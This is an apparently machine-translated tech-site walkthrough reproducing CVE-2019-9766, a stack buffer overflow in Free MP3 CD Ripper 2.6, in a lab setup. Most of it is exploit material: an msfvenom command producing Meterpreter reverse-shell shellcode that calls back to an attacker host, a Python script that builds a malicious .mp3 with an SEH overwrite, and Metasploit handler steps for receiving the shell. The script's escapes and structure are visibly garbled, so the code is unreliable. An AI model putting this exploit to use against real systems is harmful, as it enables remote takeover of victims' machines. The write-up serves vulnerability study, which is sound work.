Shulou(Shulou.com)05/31 Report--

How to achieve Free MP3 CD Ripper buffer overflow remote code execution vulnerability CVE-2019-9766 recurrence, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can get something.

Brief introduction of vulnerabilities:

Free MP3 CD Ripper is an audio format converter.

A stack buffer overflow vulnerability exists in Free MP3 CD Ripper version 2.6. Remote attackers can exploit this vulnerability to execute arbitrary code with a specially crafted .mp3 file.

Threat Typ

Remote code execution

Threat level

High

Vulnerability number

CVE-2019-9766

Affected system and application version

Free MP3 CD Ripper 2.6

Recurrence of vulnerabilities:

Attack aircraft: kali2020, kali2019

Ip:192.168.6.146

Victim: win10

Ip:192.168.6.142

Install Free MP3 CD Ripper version 2.6

1. Build the environment

Win10 downloads and installs Free MP3 CD Ripper version 2.6

Using msf to generate reverse connected shellcode

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.6.146 lport=888-f c-- smallest

Replace the shellcode in the script.

Write a script to generate a .Mp3 file

# Stack-based buffer overflow in Free MP3 CD Ripper 2.6 buffer = "A" * 4116NSEH = "\ xeb\ x06\ x90\ x90" SEH= "\ x84\ x20\ xe4\ x66" nops= "\ x90" * 5buf = "buf="\ xfc\ xe8\ x82\ X00\ X00\ x60\ x89\ xe5\ x31\ xc0\ x64\ x8b\ x50\ x30 "buf="\ x8b\ x52\ x0c\ x8b\ x52\ x8b\ x72\ x28\ X0f\ xb7\ x4a\ x26\ x31 xff "buf="\ xac\ X3c\ x61\ x7c\ X02\ x2c\ x20\ xc1\ xcf\ X0d\ X01\ xc7\ xe2\ xf2\ x52 "buf="\ X57\ X8b\ X52\ X10\ X8b\ X4a\ X3c\ X4c\ X11\ x78\ xe3\ x48\ X01\ xd1 "buf="\ X51\ x8b\ x59\ x20\ X01\ xd3\ X8b\ X18\ xe3\ x3a\ x49\ X8b "buf="\ X01\ xd6\ X31\ xff xac xc1 xcf\ X0d\ xc7\ x38\ xe0 \ x75\ xf6\ x03 "buf="\ x7d\ xf8\ x3b\ x7d\ x24\ x75\ xe4\ x58\ x58\ x24\ X01\ xd3\ x66\ x8b "buf="\ x0c\ x4b\ x58\ x1c\ x01\ xd3\ x8b\ x04\ x8b\ X01\ xd0\ x44\ x24 "buf="\ x24\ x5b\ x61\ x59\ x5a\ xff\ x5f\ x5f\ x5a\ x8b\ x12\ xeb buf= "\ X8d\ x5d\ x68\ x33\ x32\ x00 \ x00\ x68\ x77\ x73\ x32\ x5f\ x54\ x68\ x4c "buf="\ x77\ x26\ x89\ xe8\ xff\ xd0\ xb8\ X90\ X01\ x00\ x29\ xc4\ x54 "buf="\ x50\ x68\ x29\ x80\ x6b\ xff\ x6a\ x68\ xc0\ xa8\ x6e\ x84 "buf="\ x68\ x02\ x00\ x78\ xe6\ x50\ x50 \ x68\ xea\ x0f\ xdf\ xe0\ xff\ xd5\ x97\ x6a\ x10\ x56\ x57\ x68\ x99\ xa5 "buf="\ x74\ x61\ xff\ xd5\ x85\ xc0\ x74\ x0c\ xff\ x4e\ x75\ xec\ x68\ xf0 "buf="\ xb5\ xa2\ x56\ xff\ xd5\ x6a\ x6a\ x04\ x56\ x57\ x02\ xd9\ xc8 "buf="\ x5f\ xff\ xd5\ x8b\ x36\ x6a\ x40\ x68\ x10 X00\ x00\ x56\ x6a\ x00 "buf="\ x68\ x58\ xa4\ x53\ xe5\ xff\ xd5\ x93\ x53\ x6a\ x00\ x56\ x53\ x57\ x68 "buf="\ x02\ xd9\ xc8\ xd5\ X01\ xc3\ x29\ xc6\ x75\ xee\ xc3 " Pad= "B" * (316-len (nops)-len (buf)) payload=buffer+NSEH+SEH+nops+buf+padtry: f=open ("Test_Free_MP3.mp3", "w") print ("[+] Creating% s bytes mp3 Files..."% len (payload)) f.write (payload) f.close () print ("[+] mp3 File created successfully!") except: print ("File cannot be created!")

Run the script to generate a .MP3 file

Put the generated .mp3 file on win10 (VMtools required)

Kali enables msfconsole

Use the exploit/multi/handler module

Set lhost,lport, attack payload

Kali enables listening:

Win10 uses free MP3 CD ripper to open the mp3 file

Receive the bounced shell

Execute a command

Successful exploitation of vulnerabilities

PS: tell me about a pit I stepped on. This is really the first time I've ever encountered this situation:

The exploit attack machine needs to use the kali2019 version, and version 2020 cannot be exploited. Tried many times with 2020 but failed, and finally succeeded with 2019. Are there any bosses who have encountered such a situation to share their experience?

2. Repair suggestion

Update Free MP3 CD Ripper to the latest version in time

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.